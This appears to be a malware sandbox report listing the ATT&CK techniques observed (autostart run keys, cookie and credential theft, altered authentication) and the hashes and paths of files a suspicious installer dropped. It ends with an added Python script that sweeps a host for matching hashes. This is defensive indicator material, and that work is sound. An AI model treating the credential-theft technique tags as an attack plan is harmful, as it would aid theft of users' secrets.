  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
  Modify Authentication Process (1)
Privilege Escalation
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
Credential Access
  Modify Authentication Process (1)
  Steal Web Session Cookie (1)
  Unsecured Credentials (2)
    Credentials In Files (2)
Downloads
-
Filesize 32KB
MD5 12bd2bce94df1c626580e15ebae247a3
SHA1 79c2b41f5f001013554f07ed5e39900d98f87b87
SHA256 f6c8504d77261c9fff1236c01004f8ad83ef939e4ba3967522ae74d7764fc118
SHA512 e505c82cb7758668a637bb13144e1a1c9570a127321a9ccbc5cc38cf3225b9078dac384f743c82595487e2b035157eb103b8da660d25d50b13dfbf463b2c6946
-
Filesize 40B
MD5 129695cb13d7a74b2339de2c6556dd72
SHA1 314d3406a078f2c388ddd861d66e41d17985ac35
SHA256 2afff6d4c92cde01a63f9c67fa7a035a1ea17c25dc1ed06f59594880682eb02e
SHA512 085502747eae8f5927ee5b1bda77ae3eef5a3828de370deb3d2e4c199c28aab2dbd0d5bc58c4a61f582548b11dd865ffa2c21e58cbd9376051ab042c1b7337b4
-
Filesize 384B
MD5 2f23b5a8dc9256e0c4cfc767540b7db1
SHA1 ae528eeb3baac81587c3f5566319b841041c9c50
SHA256 6bf200a5d65def81eed9f365510f69a6cdd46e38331261751ca2b8aecc8278d6
SHA512 42b4e22f4e333ea19e879b33642fbf80dbce5e126eb6af90468c79fb2e415efaf955f0c1c88e1c5a9f81f41db86f605783fcf3dd359597f35c325faf52c53d0c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.83.1_0\_locales\en_CA\messages.json
Filesize 851B
MD5 07ffbe5f24ca348723ff8c6c488abfb8
SHA1 6dc2851e39b2ee38f88cf5c35a90171dbea5b690
SHA256 6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c
SHA512 7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.83.1_0\dasherSettingSchema.json
Filesize 854B
MD5 4ec1df2da46182103d2ffc3b92d20ca5
SHA1 fb9d1ba3710cf31a87165317c6edc110e98994ce
SHA256 6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6
SHA512 939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d
-
Filesize 3KB
MD5 13496db1f52ba85729cb13ccc2dcb98b
SHA1 b090eebf336ae93804435104cf033ef6f8940d3b
SHA256 cb830ea85cd5743c8e1a25555d3d17b6be5bf65bf7cffff8c331b35193a4251f
SHA512 34100dd6bc9d0490d4ad9a0c78c0ba92073a9b4f527fbdfa80dacc849549e99694d87c3846d2cd49245281675aaf51509fa6e88cb8af9b6f9ad15343b4447fab
-
Filesize 2B
MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize 523B
MD5 e70a36d920975b0c54c2ea212e4146d5
SHA1 1c1603f58315c4cfe7f6915803781e03638f14be
SHA256 c6a1be1297973d8a3b92c3b46944a1b05f4fd839127ccaa6ed35577033ee8bb9
SHA512 f18b2f1710942ea2fdcaba87fef6504c14476a6f2a0304131070d43b8b8509518a74bcae627acbf76af59d915bf5d1db3ce9a1b0c7109836e8ea4f653a0f753e
-
Filesize 8KB
MD5 385b8cda30784c9e953c5daf97012ea6
SHA1 4a78dc3839f2339afb3c0c2a9fb825332e23a801
SHA256 f39342dc6fd594d2e76975f5fe1bdbf74da1ec99bfda88b2e0eae25e756a670b
SHA512 8d5564d56098712fd14d9689087597857ce5410f74f8a5894e5bb1ed6653bfba5f44106cdefa63000d9748cc00a4474acb226a444cac7532bffed00ada91553d
-
Filesize 228KB
MD5 93445ff52b9be5e5d2e6dc596d920c6a
SHA1 3a11230b3602bcd5c41f48fd872d36492e0824dd
SHA256 890aad2b2ae7ac29be52641d9c380127154ae0cbf2307b73ba75ed13264f4a43
SHA512 a3ea673c24abc6bd76cd34d6c6ee0fbd111ea57dcb0ad2f5e1219fbfd206ae19e48b67fc1808f1f1b28763a27c182bf8d037ef2bc9e73e6154b453a3565a83b7
-
Filesize 152B
MD5 cb557349d7af9d6754aed39b4ace5bee
SHA1 04de2ac30defbb36508a41872ddb475effe2d793
SHA256 cfc24ed7d1c2e2c6585f53db7b39aa2447bf9212487b0a3c8c2a7d8e7e5572ee
SHA512 f0cf51f42d975d720d613d09f201435bf98c6283ae5bc033207f4ada93b15e49743a235a1cfb1b761bde268e2f7f8561aa57619b99bff67a36820bc1a4d0ec4a
-
Filesize 152B
MD5 aad1d98ca9748cc4c31aa3b5abfe0fed
SHA1 32e8d4d9447b13bc00ec3eb15a88c55c29489495
SHA256 2a07cac05ffcf140a9ad32e58ef51b32ecccf1e3ab5ef4e656770df813a8944e
SHA512 150ebf7e37d20f88b21ab7ea0793afe1d40b00611ed36f0cf1ac1371b656d26f11b08a84dbb958891c79776fae04c9c616e45e2e211d292988a5709857a3bf72
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\7408b9b0-d9da-4f1d-96b9-cec45ea4574e.tmp
Filesize 1B
MD5 5058f1af8388633f609cadb75a75dc9d
SHA1 3a52ce780950d4d969792a2559cd519d7ee8c727
SHA256 cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA512 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21
-
Filesize 5KB
MD5 cf30c15df842e4a3cbca233c40dcb617
SHA1 448aa422397395f10d37d04e382aeec391e0426b
SHA256 1078f3da3a2e0aa30244c361a3075acc00b98264a9d69a072f2bf8a3a7befce7
SHA512 01bc046bed7d979b9e75c1ec78922329dd234243bdccb3535f29c239a6148bae2738b28b91275bddcc93292ca09b69483868147231cc9a4ed7d0073e4fc5ddd8
-
Filesize 264KB
MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\odgo8eah.default-release\activity-stream.discovery_stream.json
Filesize 19KB
MD5 d8b3ceee384a33622f789c7dd6cecadc
SHA1 5fa6b39426a3cf3c5d222e031689f9b1238d37f6
SHA256 484f2d6e7d987f8e7e00d85b26ab9ecfdc601c096d511abb9512465dfc62c9c1
SHA512 db42919530df24e81499c67670f0b73adf5989e4633bd9a66098103e8c6a662da46adf4ec8d6badbaae1394ea8273e6c77397cd41c30eadcca63a69f978c1e48
-
Filesize 495KB
MD5 cfab78ac0d042a1d8ad7085a94328ef6
SHA1 b3070cc847ba2739450dc9bd05040df83e7d85d2
SHA256 17b10df05b4b92735b673914fe2bf0c0d7bbda5b4a8f9a7fc81a0efaa4380168
SHA512 647b909f1e833dd08d99aaa29a3404e64c58356dfa0a3abeb788768d74abb0948d2b612a6da62f2617270cd85110e8aa2b26e5e4558af0d0b84f920c40533438
-
Filesize 912KB
MD5 b15dbf4b35cd1460ba283795e24878c8
SHA1 327812be4bfdce7a87cb00fab432ecc0d8c38c1e
SHA256 0ac07db6140408e9586d46727eb32af8f8048cad535eca9052b6ef1149e63147
SHA512 95edc60c9658e0e8631604459969a406414902f297b7a14f2be6d3bc18878636167d202530d4ee3b4d7af189a9139a2183929250920196c48c08eda3d6dfdca4
-
Filesize 60B
MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\scoped_dir3432_1020961288\CRX_INSTALL\_locales\en_CA\messages.json
Filesize 711B
MD5 558659936250e03cc14b60ebf648aa09
SHA1 32f1ce0361bbfdff11e2ffd53d3ae88a8b81a825
SHA256 2445cad863be47bb1c15b57a4960b7b0d01864e63cdfde6395f3b2689dc1444b
SHA512 1632f5a3cd71887774bf3cb8a4d8b787ea6278271657b0f1d113dbe1a7fd42c4daa717cc449f157ce8972037572b882dc946a7dc2c0e549d71982dcdee89f727
-
C:\Users\Admin\AppData\Local\Temp\scoped_dir3432_1020961288\d90d0814-0b3b-4ccf-8847-a42f7508411f.tmp
Filesize 132KB
MD5 da75bb05d10acc967eecaac040d3d733
SHA1 95c08e067df713af8992db113f7e9aec84f17181
SHA256 33ae9b8f06dc777bb1a65a6ba6c3f2a01b25cd1afc291426b46d1df27ea6e7e2
SHA512 56533de53872f023809a20d1ea8532cdc2260d40b05c5a7012c8e61576ff092f006a197f759c92c6b8c429eeec4bb542073b491ddcfd5b22cd4ecbe1a8a7c6ef
-
Filesize 5.0MB
MD5 b40e4304f279119d9345be970babce41
SHA1 f76f5b30e7c333efcba1d4e19215ef1fd21d6943
SHA256 06285446d57089fe85b3b6127bbc92508773af458ad5cf20abf4570d41c0fee7
SHA512 ad7e6b30b3ba32d641737f499874f23ccda7c4539def0465d1723d579c79c5e3e981df8526d31f2eb79dc0fe572eb4b71a780eb63df11170d4b6a0786f588299
-
Filesize 33KB
MD5 290c26b1579fd3e48d60181a2d22a287
SHA1 e4c91a7f161783c68cf67250206047f23bd25a29
SHA256 973836529b57815903444dd5d4b764e8730986b1bd87179552f249062ee26128
SHA512 114a9f068b36a1edf5cce9269057f0cc17b22a10cd73cbed3ef42ae71324e41363e543a3af8be57b410c533b62bcf7f28650b464cce96e0e6c14819cdb90129a
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\odgo8eah.default-release\datareporting\glean\db\data.safe.tmp
Filesize 6KB
MD5 fede3c58bdfcb88a91432047b1f128fd
SHA1 1c491fc9e82a2973c99c3f8cc21ca08621e30e7e
SHA256 e61f096c3a95e25861a09b8eb5c2c6ea362c1cb267db99fcfadf95b5255cb062
SHA512 83b571abecece7bb4db5ff83ebaf2fb63ee9ba8f254e24d69d1504759311ea94bedcca41c341d9025e07957f1e6bf42e18e1b89f81cf00b26f1b17c9c4726993
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\odgo8eah.default-release\datareporting\glean\db\data.safe.tmp
Filesize 5KB
MD5 b8ab5f5a9d358eef42d490271a4972bd
SHA1 6c62ea867a91d6f9987dd6fcba53e8c836d81a7e
SHA256 a16e1ad8651307e1b48a4e1a3602fc29f94a5956d8e9da8e0b185a6d828251d9
SHA512 cb13570b5015e99f5dfdcdd352b4ba04fdeb9ce9122afdf17b553c2e9260c3a317b0f0029b4be7e6cf8e95d02c9e32120cd6d0f72fde0a06c8b392144f312b6d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\odgo8eah.default-release\datareporting\glean\db\data.safe.tmp
Filesize 6KB
MD5 0c1a955887112035929a4d66fe02af6e
SHA1 b49ecb972c968002d22d8c9a16d17dba1f854ee5
SHA256 19d2a0e5b2905f4acde623ce77886ef303e30428453eba60d898e3f697483138
SHA512 cc03f39553195af587fdd4ef58810bccf9de36cbb35b537b2fa09607c732280b521e35a1793539f95826f87a42e7066f9a4cd26a64ead97f9d0b0fead60df11f
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\odgo8eah.default-release\datareporting\glean\pending_pings\38e5a137-1782-4967-89bd-4f7c17aac2a8
Filesize 24KB
MD5 c49c14786336f9c00ebd194b747ae7a4
SHA1 70d2eea9e532d89055587ea6dbc022129cac7340
SHA256 0b5f79c626d509e5e2931ffbe09271311e5d0bcfa568c7ff084f0c3a5e888392
SHA512 444f404b76ef5b21ee86be3a35207390befc0500f6a908a5c32d5cbd5001e9408978abcd1dca0a1290e80c90b55a0101b1d48d03a6172f1bd309c0eeb6281e00
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\odgo8eah.default-release\datareporting\glean\pending_pings\4232b146-93ec-49fa-a518-35c41508ff67
Filesize 982B
MD5 e2e7377a862fec1091597b9997a1a39a
SHA1 e18026a0fc0b436537458b4d66cde083cf59c4f7
SHA256 d2da212ce9f468c345c06ac4309394dde3538fc7307071f227bd2de58b3d1772
SHA512 643d25f3acd2465dde9904dd11bd6de15dd4c77e354b980fd1370e04b5e2010c1747a3448a358d04907e8e7c9f25eaeb5f752b5e44bd9ac0220e249474c816c6
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\odgo8eah.default-release\datareporting\glean\pending_pings\fbcf27f9-5992-470b-a51d-798b9e3e5b72
Filesize 671B
MD5 367750b8c901ef65a4d9154ce0a5e7a6
SHA1 8d263e209720a507106002089edc7196565f20c9
SHA256 8c2371245371dfd6a17eee6c97201ee2f98f9dac91b48aaaefa0205bac8d0ff3
SHA512 8e573c0010e2521d353cafaf6a3a648adf9cd30801c5bd9d7b416f2ba49f7ad82589b45dd3654949fcd20a238b33cc8f7ba888cfc9554894ab72582a07fceb40
-
Filesize 11KB
MD5 45f3c3e6fd2d81140b9bedbd50c80e48
SHA1 5a89a42c3943a9431e7dd7dbbf9a1d340740088f
SHA256 579c97519c8865504246f3c6c631a25145787fa086a30260e4013b8e8775a373
SHA512 483bd2eb019b425ad9b478dafa0f536e45a610706b72cf6bab2aacaa0bcdfaf63625b9a1f26dfff76ea6cddb7461e64ae9294a283212b9dfe63c0d4ccbb640f6
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\odgo8eah.default-release\sessionCheckpoints.json
Filesize 288B
MD5 948a7403e323297c6bb8a5c791b42866
SHA1 88a555717e8a4a33eccfb7d47a2a4aa31038f9c0
SHA256 2fca1f29b73dd5b4159fa1eb16e69276482f5224ba7d2219a547039129a51f0e
SHA512 17e2f65c33f47c8bb4beca31db2aff3d4bbb6c2d36924057f9f847e207bdcb85ffcbb32c80dd06862ffc9b7f0bd3f5e2e65b48bb1bc3363732751101d5596b1a
-
Filesize 2.4MB
MD5 91923bb27bc8794ac3d863ea202213c0
SHA1 0e29411e8bb49d3b72df6102ff2179d127c62f72
SHA256 51b655fe2898a15bb4a59a3f26afb372e78cfc852ce3ece7d796908927719b8c
SHA512 d0babb4f88f52d2d656527ac32594c0dc33f170ad50edf3634c1c366f8f29c590c454a82584167bd2bdb48ffab9fe5aa2c0d22b7703513e2e8a58e7c494abc64
-
Filesize 56KB
MD5 9ecf948d81b0532a19fec8f8c5384384
SHA1 fa6762e08f9a34079fe115726519121b13217925
SHA256 13b9bb9eadf49780ac76f6c8f7701923e0c37b6753e17e72508155ad7e882278
SHA512 63e66617ec86f3726a604b03ac03209c9b5d0af9f98e9952c416870d68266674c1a7437903f1ae9bd0e2a9a10f4c46187a304c3e560f7a42ea3b21bc1e731e19
-
C:\Users\Admin\AppData\Roaming\United legacy corporation\Setup 1.3.4\install\F5B53CD\jre\bin\awt.dll
Filesize 1.1MB
MD5 159ccf1200c422ced5407fed35f7e37d
SHA1 177a216b71c9902e254c0a9908fcb46e8d5801a9
SHA256 30eb581c99c8bcbc54012aa5e6084b6ef4fcee5d9968e9cc51f5734449e1ff49
SHA512 ab3f4e3851313391b5b8055e4d526963c38c4403fa74fb70750cc6a2d5108e63a0e600978fa14a7201c48e1afd718a1c6823d091c90d77b17562b7a4c8c40365
-
C:\Users\Admin\AppData\Roaming\United legacy corporation\Setup 1.3.4\install\F5B53CD\jre\bin\bci.dll
Filesize 15KB
MD5 a46289384f76c2a41ba7251459849288
SHA1 4d8ef96edbe07c8722fa24e4a5b96ebfa18be2c4
SHA256 728d64bc1fbf48d4968b1b93893f1b5db88b052ab82202c6840bf7886a64017d
SHA512 34d62beb1fa7d8630f5562c1e48839ce9429faea980561e58076df5f19755761454eeb882790ec1035c64c654fc1a8cd5eb46eca12e2bc81449acbb73296c9e8
-
C:\Users\Admin\AppData\Roaming\United legacy corporation\Setup 1.3.4\install\F5B53CD\jre\bin\client\Xusage.txt
Filesize 1KB
MD5 f4188deb5103b6d7015b2106938bfa23
SHA1 8e3781a080cd72fde8702eb6e02a05a23b4160f8
SHA256 bd54e6150ad98b444d5d24cea9ddafe347ed11a1aae749f8e4d59c963e67e763
SHA512 0be9a00a48cf8c7d210126591e61531899502e694a3c3ba7c3235295e80b1733b6f399cae58fb4f7bff2c934da7782d256bdf46793f814a5f25b7a811d0cb2e3
-
C:\Users\Admin\AppData\Roaming\United legacy corporation\Setup 1.3.4\install\F5B53CD\jre\bin\client\jvm.dll
Filesize 3.7MB
MD5 39c302fe0781e5af6d007e55f509606a
SHA1 23690a52e8c6578de6a7980bb78aae69d0f31780
SHA256 b1fbdbb1e4c692b34d3b9f28f8188fc6105b05d311c266d59aa5e5ec531966bc
SHA512 67f91a75e16c02ca245233b820df985bd8290a2a50480dff4b2fd2695e3cf0b4534eb1bf0d357d0b14f15ce8bd13c82d2748b5edd9cc38dc9e713f5dc383ed77
-
C:\Users\Admin\AppData\Roaming\United legacy corporation\Setup 1.3.4\install\F5B53CD\jre\bin\dcpr.dll
Filesize 139KB
MD5 4bdc32ef5da731393acc1b8c052f1989
SHA1 a677c04ecd13f074de68cc41f13948d3b86b6c19
SHA256 a3b35cc8c2e6d22b5832af74aaf4d1bb35069edd73073dffec2595230ca81772
SHA512 e71ea78d45e6c6bd08b2c5cd31f003f911fd4c82316363d26945d17977c2939f65e3b9748447006f95c3c6653ce30d2cda67322d246d43c9eb892a8e83deb31a
-
C:\Users\Admin\AppData\Roaming\United legacy corporation\Setup 1.3.4\install\F5B53CD\jre\bin\decora_sse.dll
Filesize 62KB
MD5 b04abe76c4147de1d726962f86473cf2
SHA1 3104bada746678b0a88e5e4a77904d78a71d1ab8
SHA256 07ff22e96dcfd89226e5b85cc07c34318dd32cda23b7ea0474e09338654bfeb3
SHA512 2e4e2feb63b6d7388770d8132a880422abf6a01941bff12cad74db4a641bda2dcc8bf58f6dae90e41cc250b79e7956ddf126943e0f6200272f3376a9a19505f1
-
C:\Users\Admin\AppData\Roaming\United legacy corporation\Setup 1.3.4\install\F5B53CD\jre\bin\deploy.dll
Filesize 442KB
MD5 5edaeffc60b5f1147068e4a296f6d7fb
SHA1 7d36698c62386449a5fa2607886f4adf7fb3deef
SHA256 87847204933551f69f1cba7a73b63a252d12ef106c22ed9c561ef188dffcbae8
SHA512 a691ef121d3ac17569e27bb6de4688d3506895b1a1a8740e1f16e80eefce70ba18b9c1efd6fd6794fafc59ba2caf137b4007fcdc65ddb8bcbfcf42c97b13535b
-
C:\Users\Admin\AppData\Roaming\United legacy corporation\Setup 1.3.4\install\F5B53CD\jre\bin\dtplugin\deployJava1.dll
Filesize 808KB
MD5 e741028613b1fc49ec5a899be6e3fc34
SHA1 9eae3d3ca22e92a925395a660b55cecb2eb62d54
SHA256 9163a546696e581d443b3a6250f61e5368be984c69adfb54ee2b0e51d0fa008e
SHA512 05c6ce707f4f0f415e74d32f1aacec7e2c7746c3d04c75502eaecafaf9e0108ce6206a8a3939c92edce449ffc0a68fb4389edaa93d61920d1ec85327d1b3a55a
-
C:\Users\Admin\AppData\Roaming\United legacy corporation\Setup 1.3.4\install\F5B53CD\lib\asm-all.jar
Filesize 241KB
MD5 f5ad16c7f0338b541978b0430d51dc83
SHA1 2ea49e08b876bbd33e0a7ce75c8f371d29e1f10a
SHA256 7fbffbc1db3422e2101689fd88df8384b15817b52b9b2b267b9f6d2511dc198d
SHA512 82e6749f4a6956f5b8dd5a5596ca170a1b7ff4e551714b56a293e6b8c7b092cbec2bec9dc0d9503404deb8f175cbb1ded2e856c6bc829411c8ed311c1861336a
-
Filesize 206KB
MD5 899944fb96ccc34cfbd2ccb9134367c5
SHA1 7c46aa3f84ba5da95ceff39cd49185672f963538
SHA256 780d10eda2b9a0a10bf844a7c8b6b350aa541c5bbd24022ff34f99201f9e9259
SHA512 2c41181f9af540b4637f418fc148d41d7c38202fb691b56650085fe5a9bdba068275ff07e002e1044760754876c62d7b4fc856452af80a02c5f5a9a7dc75b5e0
-
C:\Users\Admin\AppData\Roaming\United legacy corporation\Setup\jre\lib\images\cursors\invalid32x32.gif
Filesize 153B
MD5 1e9d8f133a442da6b0c74d49bc84a341
SHA1 259edc45b4569427e8319895a444f4295d54348f
SHA256 1a1d3079d49583837662b84e11d8c0870698511d9110e710eb8e7eb20df7ae3b
SHA512 63d6f70c8cab9735f0f857f5bf99e319f6ae98238dc7829dd706b7d6855c70be206e32e3e55df884402483cf8bebad00d139283af5c0b85dc1c5bf8f253acd37
-
Filesize 2.3MB
MD5 5d52ef45b6e5bf144307a84c2af1581b
SHA1 414a899ec327d4a9daa53983544245b209f25142
SHA256 26a24d3b0206c6808615c7049859c2fe62c4dcd87e7858be40ae8112b0482616
SHA512 458f47c1e4ccf41edaacc57abb663ee77ca098fffc596fad941bbdea67653aeabc79b34d607078b9ee5adb45614e26f5c28a09e8faf9532081fdd5dec9ac3c48
-
Filesize 602KB
MD5 78b793e3f44b2c7849ffe70083c500c0
SHA1 9dcbb160c9f606bcdbee9ad572aaab1ad1b24d61
SHA256 fbcf7c3645d90621bfbbf38e660a510dd0731b02b6e7820b075116e944301174
SHA512 36d0fadd2a55231ce159519ca4bfb56fee038ee82bfbafa375faee17e11e2149ffffb4b364bc80e4ed950325e0c31e6a02244c591a0b983c7ccc039e94a3e9c8
-
Filesize 24.6MB
MD5 1fdddc4b54bc628174fc3203b911c71e
SHA1 af3d8378ded446c2995ad006613ad02d268c397c
SHA256 f6926f5778fad2f8eb1d28021b216f7c23e0f1e69db74f51eb155c01679955d8
SHA512 db6451c8b04e82daab5cf85a6c0ac935195dcff3ccb9789f99cf71b2b1cce297e5fa9a53c8f0a0983ed2fe4a376cf7844234953dcf8de6e426c1a65bcf8f5a16
-
\??\Volume{8555371d-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{17cf8bf1-929f-411d-853b-a718664867c9}_OnDiskSnapshotProp
Filesize 6KB
MD5 3cf425d8bf67264b92b51eb28cd7ca0c
SHA1 9da160674ff6c724fb40cfde0c1087a24021adba
SHA256 f9f72937bd1e5f073893e9e1e303163260f53704d11b2299781dcbd3586f1a8d
SHA512 1e99808fa6b5111a76dc838ff99d5ab4ea3b5b93fa2413b23bfad96f27a55536e1677235d79972c6cfb9897d54280830e059e25c6e206265a8fb97874d00ec7c
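The dropped-file listing above is the IOC set a responder would sweep a suspect host for. The Python below is an added example, not part of this sandbox report: it parses a listing in this report's layout (an optional path line, Filesize, then MD5/SHA1/SHA256/SHA512 lines, entries separated by "-" lines, with each label either fused to its value as the page extraction renders it or separated by a space), then hashes every file under a directory and reports those whose strongest available digest matches an entry. The embedded listing is constructed for the demonstration (an empty file and a three-byte "abc" file with their standard digests) and is not copied from the report; to use it in earnest, feed `parse_dropped_files` the report's own listing and point `scan_tree` at the user's AppData tree. Note the caveat a hit carries: several entries above are what a bundled Java runtime and the browsers themselves write (jre\bin DLLs, profile files, extension locale JSON), so a matching hash shows the installer or browser ran, not by itself that the file is malicious.

```python
"""Sweep a directory tree for files listed in a sandbox report's dropped-file section.
Added example, not part of the report. Handles both 'MD5<hex>' and 'MD5 <hex>' lines."""
from __future__ import annotations

import hashlib
import os
import re
import shutil
import tempfile
from dataclasses import dataclass, field
from typing import Optional

HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s*([0-9a-fA-F]+)$")
SIZE_RE = re.compile(r"^Filesize\s*(\S+)?$")
HEX_LEN = {"md5": 32, "sha1": 40, "sha256": 64, "sha512": 128}
PREFERENCE = ("sha512", "sha256", "sha1", "md5")   # strongest digest first


@dataclass
class DroppedFile:
    path: Optional[str] = None        # None when the report omits the path
    size: Optional[str] = None        # as printed in the report, e.g. '32KB'
    hashes: dict = field(default_factory=dict)


def parse_dropped_files(text: str) -> list[DroppedFile]:
    """Parse the listing; entries that carry no well-formed hash are discarded."""
    entries: list[DroppedFile] = []
    cur, want_size = DroppedFile(), False
    for raw in text.splitlines():
        line = raw.strip()
        if line in ("", "-"):                 # entry separator
            if cur.hashes:
                entries.append(cur)
            cur, want_size = DroppedFile(), False
            continue
        if want_size:                         # 'Filesize' alone, value on the next line
            cur.size, want_size = line, False
            continue
        m = SIZE_RE.match(line)
        if m:
            cur.size, want_size = m.group(1), m.group(1) is None
            continue
        m = HASH_RE.match(line)
        if m:
            algo, digest = m.group(1).lower(), m.group(2).lower()
            if len(digest) == HEX_LEN[algo]:  # reject truncated or garbled digests
                cur.hashes[algo] = digest
            continue
        if not cur.hashes:                    # any other line before the hashes is the path
            cur.path = line
    if cur.hashes:
        entries.append(cur)
    return entries


def hash_file(path: str) -> dict[str, str]:
    """MD5, SHA-1, SHA-256 and SHA-512 of one file, read once in 1 MiB chunks."""
    hs = {algo: hashlib.new(algo) for algo in HEX_LEN}
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            for h in hs.values():
                h.update(chunk)
    return {algo: h.hexdigest() for algo, h in hs.items()}


def scan_tree(root: str, iocs: list[DroppedFile]) -> list[tuple[str, DroppedFile]]:
    """Hash every regular file under root; return (local path, matching IOC) pairs.
    Each IOC is keyed by its strongest digest, so an MD5-only entry still matches
    while entries that carry SHA-256/512 are never compared on a weak hash."""
    index: dict[tuple[str, str], DroppedFile] = {}
    for ioc in iocs:
        for algo in PREFERENCE:
            if algo in ioc.hashes:
                index[(algo, ioc.hashes[algo])] = ioc
                break
    hits: list[tuple[str, DroppedFile]] = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            p = os.path.join(dirpath, name)
            if not os.path.isfile(p):
                continue
            digests = hash_file(p)
            for algo in PREFERENCE:
                ioc = index.get((algo, digests[algo]))
                if ioc is not None:
                    hits.append((p, ioc))
                    break
    return hits


# Constructed sample in the report's layout, NOT copied from the report: an empty
# file and a 3-byte file containing "abc", whose standard digests are well known.
SAMPLE_LISTING = """\
-
C:\\Users\\Admin\\AppData\\Local\\Temp\\empty.bin
Filesize0B
MD5d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
-
Filesize
3B
MD5 900150983cd24fb0d6963f7d28e17f72
SHA256 ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad
"""


def demo_scan() -> list[str]:
    """Write one file per sample IOC plus a decoy into a scratch directory,
    sweep it, and return the base names that matched."""
    root = tempfile.mkdtemp(prefix="ioc_sweep_")
    try:
        for name, data in (("a.bin", b""), ("b.bin", b"abc"), ("c.bin", b"decoy")):
            with open(os.path.join(root, name), "wb") as f:
                f.write(data)
        hits = scan_tree(root, parse_dropped_files(SAMPLE_LISTING))
        return sorted(os.path.basename(p) for p, _ in hits)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for e in parse_dropped_files(SAMPLE_LISTING):
        print(e.path or "(path not given)", e.size, e.hashes)
    print("matched:", demo_scan())
```

Entries the report lists without a path are kept (they still carry hashes) and matched by digest alone; the Filesize string is retained as printed rather than parsed, since the report rounds it and it cannot be used as a reliable secondary check.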